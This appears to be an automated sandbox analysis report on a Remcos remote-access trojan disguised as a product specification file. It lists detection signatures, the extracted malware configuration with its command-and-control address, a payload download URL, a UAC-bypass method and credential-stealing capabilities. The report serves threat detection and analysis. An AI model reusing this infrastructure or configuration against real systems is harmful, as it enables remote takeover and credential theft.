Windows Analysis Report
OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Overview

General Information

Sample name:	OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe renamed because original name is a hash value
Original sample name:	OBLIGT PRODUKTA SPECIFIKCIJA.scr.exe
Analysis ID:	1638600
MD5:	6c68b5aac4547d912c81cb1fb67888be
SHA1:	5144b181b368ac4afd6aef45a781a8bdc3508a0a
SHA256:	2bc8d61404e72f2eb612343614a9972fc8adbe09c1d00a5cf91a9e7e41036291
Tags:	exeuser-TeamDreier
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Contains functionalty to change the wallpaper

Delayed program exit found

Deletes itself after installation

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected WebBrowserPassView password recovery tool

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to detect virtual machines (SGDT)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Found malware configuration

Source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["15.204.0.108:4607:1"], "Assigned name": "others", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RRTJVV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for submitted file

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Virustotal: Detection: 27%			Perma Link
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	ReversingLabs: Detection: 21%

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00432B45 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

3_2_00432B45

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_b4768dc1-4

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe.3c73988.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe PID: 8840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 9048, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00406764 _wcslen,CoGetObject,

3_2_00406764

Uses 32bit PE files

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: InstallUtil.exe, InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1515224876.0000000006780000.00000004.08000000.00040000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000004095000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003FDB000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1515224876.0000000006780000.00000004.08000000.00040000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000004095000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1514993699.0000000006180000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0040B335
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0040B53A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	3_2_0041B63A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_0044D7F9 FindFirstFileExA,	3_2_0044D7F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	3_2_004089A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00406AC2 FindFirstFileW,FindNextFileW,	3_2_00406AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	3_2_00407A8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	3_2_00408DA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,	3_2_00418E5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 3_2_10006580 FindFirstFileExA,	3_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 6_2_0040B477 FindFirstFileW,FindNextFileW,	6_2_0040B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	8_2_00407EF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 9_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	9_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

3_2_00406F06

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 4x nop then jmp 067E5280h		0_2_067E51C8
Source: C:\Users\user\Desktop\OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	Code function: 4x nop then jmp 067E5280h		0_2_067E51C3

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49723 -> 15.204.0.108:4607
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49724 -> 15.204.0.108:4607

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 15.204.0.108

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.5:49723 -> 15.204.0.108:4607

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.5:59946 -> 162.159.36.2:53

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /cir/Pvxorwu.wav HTTP/1.1Host: 91.223.3.167Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 15.204.0.108 15.204.0.108
Source: Joe Sandbox View	IP Address: 15.204.0.108 15.204.0.108
Source: Joe Sandbox View	IP Address: 91.223.3.167 91.223.3.167

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HP-INTERNET-ASUS HP-INTERNET-ASUS

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49725 -> 178.237.33.50:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167
Source: unknown	TCP traffic detected without corresponding DNS query: 91.223.3.167

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 3_2_00426302 recv,

3_2_00426302

Source: global traffic	HTTP traffic detected: GET /cir/Pvxorwu.wav HTTP/1.1Host: 91.223.3.167Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: InstallUtil.exe, 00000006.00000002.1514830787.000000000142D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.facebook.com (Facebook)
Source: InstallUtil.exe, 00000006.00000002.1514830787.000000000142D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login? equals www.yahoo.com (Yahoo)
Source: InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: InstallUtil.exe, 00000006.00000002.1513148426.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: InstallUtil.exe, InstallUtil.exe, 00000009.00000002.1506345264.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: InstallUtil.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: geoplugin.net
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1476027682.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://91.223.3.167
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe	String found in binary or memory: http://91.223.3.167/cir/Pvxorwu.wav
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://c.pki.goog/r/r4.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://c.pki.goog/we2/64OUIVzpZV4.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
Source: InstallUtil.exe, InstallUtil.exe, 00000003.00000002.3747543577.0000000000AD7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3747753610.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3747753610.0000000000B12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003D30000.00000004.00000800.00020000.00000000.sdmp, OBLIG#U0100T#U0100 PRODUKTA SPECIFIK#U0100CIJA.scr.exe, 00000000.00000002.1493124688.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3746761477.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://i.pki.goog/gsr1.crt0-
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://i.pki.goog/r4.crt0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://i.pki.goog/we2.crt0
Source: powershell.exe, 00000004.00000002.1590414746.00000000054ED000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://o.pki.goog/we20%
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhv8FEB.tmp.6.dr	String found in binary or memory: http://ocsp.digicert.com0:
